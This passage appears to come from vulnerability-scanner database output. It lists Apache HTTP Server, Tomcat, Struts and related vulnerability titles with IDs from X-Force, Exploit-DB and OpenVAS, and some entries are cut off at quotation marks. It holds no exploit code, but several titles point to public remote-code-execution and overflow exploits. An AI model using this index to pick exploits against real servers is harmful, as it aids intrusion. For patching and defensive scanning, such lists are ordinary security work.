7579| [14125] Apache HTTP Server mod_userdir module information disclosure
7580| [14075] Apache HTTP Server mod_php file descriptor leak
7581| [13703] Apache HTTP Server account
7582| [13689] Apache HTTP Server configuration allows symlinks
7583| [13688] Apache HTTP Server configuration allows SSI
7584| [13687] Apache HTTP Server Server: header value
7585| [13685] Apache HTTP Server ServerTokens value
7586| [13684] Apache HTTP Server ServerSignature value
7587| [13672] Apache HTTP Server config allows directory autoindexing
7588| [13671] Apache HTTP Server default content
7589| [13670] Apache HTTP Server config file directive references outside content root
7590| [13668] Apache HTTP Server httpd not running in chroot environment
7591| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
7592| [13664] Apache HTTP Server config file contains ScriptAlias entry
7593| [13663] Apache HTTP Server CGI support modules loaded
7594| [13661] Apache HTTP Server config file contains AddHandler entry
7595| [13660] Apache HTTP Server 500 error page not CGI script
7596| [13659] Apache HTTP Server 413 error page not CGI script
7597| [13658] Apache HTTP Server 403 error page not CGI script
7598| [13657] Apache HTTP Server 401 error page not CGI script
7599| [13552] Apache HTTP Server mod_cgid module information disclosure
7600| [13550] Apache GET request directory traversal
7601| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
7602| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
7603| [13429] Apache Tomcat non-HTTP request denial of service
7604| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
7605| [13295] Apache weak password encryption
7606| [13254] Apache Tomcat .jsp cross-site scripting
7607| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
7608| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
7609| [12681] Apache HTTP Server mod_proxy could allow mail relaying
7610| [12662] Apache HTTP Server rotatelogs denial of service
7611| [12554] Apache Tomcat stores password in plain text
7612| [12553] Apache HTTP Server redirects and subrequests denial of service
7613| [12552] Apache HTTP Server FTP proxy server denial of service
7614| [12551] Apache HTTP Server prefork MPM denial of service
7615| [12550] Apache HTTP Server weaker than expected encryption
7616| [12549] Apache HTTP Server type-map file denial of service
7617| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
7618| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
7619| [12091] Apache HTTP Server apr_password_validate denial of service
7620| [12090] Apache HTTP Server apr_psprintf code execution
7621| [11804] Apache HTTP Server mod_access_referer denial of service
7622| [11750] Apache HTTP Server could leak sensitive file descriptors
7623| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
7624| [11703] Apache long slash path allows directory listing
7625| [11695] Apache HTTP Server LF (Line Feed) denial of service
7626| [11694] Apache HTTP Server filestat.c denial of service
7627| [11438] Apache HTTP Server MIME message boundaries information disclosure
7628| [11412] Apache HTTP Server error log terminal escape sequence injection
7629| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
7630| [11195] Apache Tomcat web.xml could be used to read files
7631| [11194] Apache Tomcat URL appended with a null character could list directories
7632| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
7633| [11126] Apache HTTP Server illegal character file disclosure
7634| [11125] Apache HTTP Server DOS device name HTTP POST code execution
7635| [11124] Apache HTTP Server DOS device name denial of service
7636| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
7637| [10938] Apache HTTP Server printenv test CGI cross-site scripting
7638| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
7639| [10575] Apache mod_php module could allow an attacker to take over the httpd process
7640| [10499] Apache HTTP Server WebDAV HTTP POST view source
7641| [10457] Apache HTTP Server mod_ssl "
7642| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
7643| [10414] Apache HTTP Server htdigest multiple buffer overflows
7644| [10413] Apache HTTP Server htdigest temporary file race condition
7645| [10412] Apache HTTP Server htpasswd temporary file race condition
7646| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
7647| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
7648| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
7649| [10280] Apache HTTP Server shared memory scorecard overwrite
7650| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
7651| [10241] Apache HTTP Server Host: header cross-site scripting
7652| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
7653| [10208] Apache HTTP Server mod_dav denial of service
7654| [10206] HP VVOS Apache mod_ssl denial of service
7655| [10200] Apache HTTP Server stderr denial of service
7656| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
7657| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
7658| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
7659| [10098] Slapper worm targets OpenSSL/Apache systems
7660| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
7661| [9875] Apache HTTP Server .var file request could disclose installation path
7662| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
7663| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
7664| [9623] Apache HTTP Server ap_log_rerror() path disclosure
7665| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
7666| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
7667| [9396] Apache Tomcat null character to threads denial of service
7668| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
7669| [9249] Apache HTTP Server chunked encoding heap buffer overflow
7670| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
7671| [8932] Apache Tomcat example class information disclosure
7672| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
7673| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
7674| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
7675| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
7676| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
7677| [8400] Apache HTTP Server mod_frontpage buffer overflows
7678| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
7679| [8308] Apache "
7680| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
7681| [8119] Apache and PHP OPTIONS request reveals "
7682| [8054] Apache is running on the system
7683| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
7684| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
7685| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
7686| [7836] Apache HTTP Server log directory denial of service
7687| [7815] Apache for Windows "
7688| [7810] Apache HTTP request could result in unexpected behavior
7689| [7599] Apache Tomcat reveals installation path
7690| [7494] Apache "
7691| [7419] Apache Web Server could allow remote attackers to overwrite .log files
7692| [7363] Apache Web Server hidden HTTP requests
7693| [7249] Apache mod_proxy denial of service
7694| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
7695| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
7696| [7059] Apache "
7697| [7057] Apache "
7698| [7056] Apache "
7699| [7055] Apache "
7700| [7054] Apache "
7701| [6997] Apache Jakarta Tomcat error message may reveal information
7702| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
7703| [6970] Apache crafted HTTP request could reveal the internal IP address
7704| [6921] Apache long slash path allows directory listing
7705| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
7706| [6527] Apache Web Server for Windows and OS2 denial of service
7707| [6316] Apache Jakarta Tomcat may reveal JSP source code
7708| [6305] Apache Jakarta Tomcat directory traversal
7709| [5926] Linux Apache symbolic link
7710| [5659] Apache Web server discloses files when used with php script
7711| [5310] Apache mod_rewrite allows attacker to view arbitrary files
7712| [5204] Apache WebDAV directory listings
7713| [5197] Apache Web server reveals CGI script source code
7714| [5160] Apache Jakarta Tomcat default installation
7715| [5099] Trustix Secure Linux installs Apache with world writable access
7716| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
7717| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
7718| [4931] Apache source.asp example file allows users to write to files
7719| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
7720| [4205] Apache Jakarta Tomcat delivers file contents
7721| [2084] Apache on Debian by default serves the /usr/doc directory
7722| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
7723| [697] Apache HTTP server beck exploit
7724| [331] Apache cookies buffer overflow
7725|
7726| Exploit-DB - https://www.exploit-db.com:
7727| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
7728| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
7729| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
7730| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
7731| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
7732| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
7733| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
7734| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
7735| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
7736| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
7737| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
7738| [29859] Apache Roller OGNL Injection
7739| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
7740| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
7741| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
7742| [29290] Apache / PHP 5.x Remote Code Execution Exploit
7743| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
7744| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
7745| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
7746| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
7747| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
7748| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
7749| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
7750| [27096] Apache Geronimo 1.0 Error Page XSS
7751| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
7752| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
7753| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
7754| [25986] Plesk Apache Zeroday Remote Exploit
7755| [25980] Apache Struts includeParams Remote Code Execution
7756| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
7757| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
7758| [24874] Apache Struts ParametersInterceptor Remote Code Execution
7759| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
7760| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
7761| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
7762| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
7763| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
7764| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
7765| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
7766| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
7767| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
7768| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
7769| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
7770| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
7771| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
7772| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
7773| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
7774| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
7775| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
7776| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
7777| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
7778| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
7779| [21719] Apache 2.0 Path Disclosure Vulnerability
7780| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
7781| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
7782| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
7783| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
7784| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
7785| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
7786| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
7787| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
7788| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
7789| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
7790| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
7791| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
7792| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
7793| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
7794| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
7795| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
7796| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
7797| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
7798| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
7799| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
7800| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
7801| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
7802| [20558] Apache 1.2 Web Server DoS Vulnerability
7803| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
7804| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
7805| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
7806| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
7807| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
7808| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
7809| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
7810| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
7811| [19231] PHP apache_request_headers Function Buffer Overflow
7812| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
7813| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
7814| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
7815| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
7816| [18442] Apache httpOnly Cookie Disclosure
7817| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
7818| [18221] Apache HTTP Server Denial of Service
7819| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
7820| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
7821| [17691] Apache Struts < 2.2.0 - Remote Command Execution
7822| [16798] Apache mod_jk 1.2.20 Buffer Overflow
7823| [16782] Apache Win32 Chunked Encoding
7824| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
7825| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
7826| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
7827| [15319] Apache 2.2 (Windows) Local Denial of Service
7828| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
7829| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7830| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
7831| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
7832| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
7833| [12330] Apache OFBiz - Multiple XSS
7834| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
7835| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
7836| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
7837| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
7838| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
7839| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
7840| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
7841| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
7842| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7843| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
7844| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
7845| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
7846| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7847| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
7848| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
7849| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
7850| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
7851| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
7852| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
7853| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
7854| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
7855| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
7856| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
7857| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
7858| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
7859| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
7860| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
7861| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
7862| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
7863| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
7864| [466] htpasswd Apache 1.3.31 - Local Exploit
7865| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
7866| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
7867| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
7868| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
7869| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
7870| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
7871| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
7872| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
7873| [9] Apache HTTP Server 2.x Memory Leak Exploit
7874|
7875| OpenVAS (Nessus) - http://www.openvas.org:
7876| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
7877| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
7878| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
7879| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
7880| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
7881| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
7882| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
7883| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
7884| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
7885| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
7886| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
7887| [900571] Apache APR-Utils Version Detection
7888| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
7889| [900496] Apache Tiles Multiple XSS Vulnerability
7890| [900493] Apache Tiles Version Detection
7891| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
7892| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
7893| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
7894| [870175] RedHat Update for apache RHSA-2008:0004-01
7895| [864591] Fedora Update for apache-poi FEDORA-2012-10835
7896| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
7897| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
7898| [864250] Fedora Update for apache-poi FEDORA-2012-7683
7899| [864249] Fedora Update for apache-poi FEDORA-2012-7686
7900| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
7901| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
7902| [855821] Solaris Update for Apache 1.3 122912-19
7903| [855812] Solaris Update for Apache 1.3 122911-19
7904| [855737] Solaris Update for Apache 1.3 122911-17
7905| [855731] Solaris Update for Apache 1.3 122912-17
7906| [855695] Solaris Update for Apache 1.3 122911-16
7907| [855645] Solaris Update for Apache 1.3 122912-16
7908| [855587] Solaris Update for kernel update and Apache 108529-29
7909| [855566] Solaris Update for Apache 116973-07
7910| [855531] Solaris Update for Apache 116974-07
7911| [855524] Solaris Update for Apache 2 120544-14
7912| [855494] Solaris Update for Apache 1.3 122911-15
7913| [855478] Solaris Update for Apache Security 114145-11
7914| [855472] Solaris Update for Apache Security 113146-12
7915| [855179] Solaris Update for Apache 1.3 122912-15
7916| [855147] Solaris Update for kernel update and Apache 108528-29
7917| [855077] Solaris Update for Apache 2 120543-14
7918| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
7919| [850088] SuSE Update for apache2 SUSE-SA:2007:061
7920| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
7921| [841209] Ubuntu Update for apache2 USN-1627-1
7922| [840900] Ubuntu Update for apache2 USN-1368-1
7923| [840798] Ubuntu Update for apache2 USN-1259-1
7924| [840734] Ubuntu Update for apache2 USN-1199-1
7925| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
7926| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
7927| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
7928| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
7929| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
7930| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
7931| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
7932| [835253] HP-UX Update for Apache Web Server HPSBUX02645
7933| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
7934| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
7935| [835236] HP-UX Update for Apache with PHP HPSBUX02543
7936| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
7937| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
7938| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
7939| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
7940| [835188] HP-UX Update for Apache HPSBUX02308
7941| [835181] HP-UX Update for Apache With PHP HPSBUX02332
7942| [835180] HP-UX Update for Apache with PHP HPSBUX02342
7943| [835172] HP-UX Update for Apache HPSBUX02365
7944| [835168] HP-UX Update for Apache HPSBUX02313
7945| [835148] HP-UX Update for Apache HPSBUX01064
7946| [835139] HP-UX Update for Apache with PHP HPSBUX01090
7947| [835131] HP-UX Update for Apache HPSBUX00256
7948| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
7949| [835104] HP-UX Update for Apache HPSBUX00224
7950| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
7951| [835101] HP-UX Update for Apache HPSBUX01232
7952| [835080] HP-UX Update for Apache HPSBUX02273
7953| [835078] HP-UX Update for ApacheStrong HPSBUX00255
7954| [835044] HP-UX Update for Apache HPSBUX01019
7955| [835040] HP-UX Update for Apache PHP HPSBUX00207
7956| [835025] HP-UX Update for Apache HPSBUX00197
7957| [835023] HP-UX Update for Apache HPSBUX01022
7958| [835022] HP-UX Update for Apache HPSBUX02292
7959| [835005] HP-UX Update for Apache HPSBUX02262
7960| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
7961| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
7962| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
7963| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
7964| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
7965| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
7966| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
7967| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
7968| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
7969| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
7970| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
7971| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
7972| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
7973| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
7974| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
7975| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
7976| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
7977| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
7978| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
7979| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
7980| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
7981| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
7982| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
7983| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
7984| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
7985| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
7986| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
7987| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
7988| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
7989| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
7990| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
7991| [801942] Apache Archiva Multiple Vulnerabilities
7992| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
7993| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
7994| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
7995| [801284] Apache Derby Information Disclosure Vulnerability
7996| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
7997| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
7998| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
7999| [800680] Apache APR Version Detection
8000| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
8001| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
8002| [800677] Apache Roller Version Detection
8003| [800279] Apache mod_jk Module Version Detection
8004| [800278] Apache Struts Cross Site Scripting Vulnerability
8005| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
8006| [800276] Apache Struts Version Detection
8007| [800271] Apache Struts Directory Traversal Vulnerability
8008| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
8009| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
8010| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
8011| [103122] Apache Web Server ETag Header Information Disclosure Weakness
8012| [103074] Apache Continuum Cross Site Scripting Vulnerability
8013| [103073] Apache Continuum Detection
8014| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
8015| [101023] Apache Open For Business Weak Password security check
8016| [101020] Apache Open For Business HTML injection vulnerability
8017| [101019] Apache Open For Business service detection
8018| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
8019| [100923] Apache Archiva Detection
8020| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
8021| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
8022| [100813] Apache Axis2 Detection
8023| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
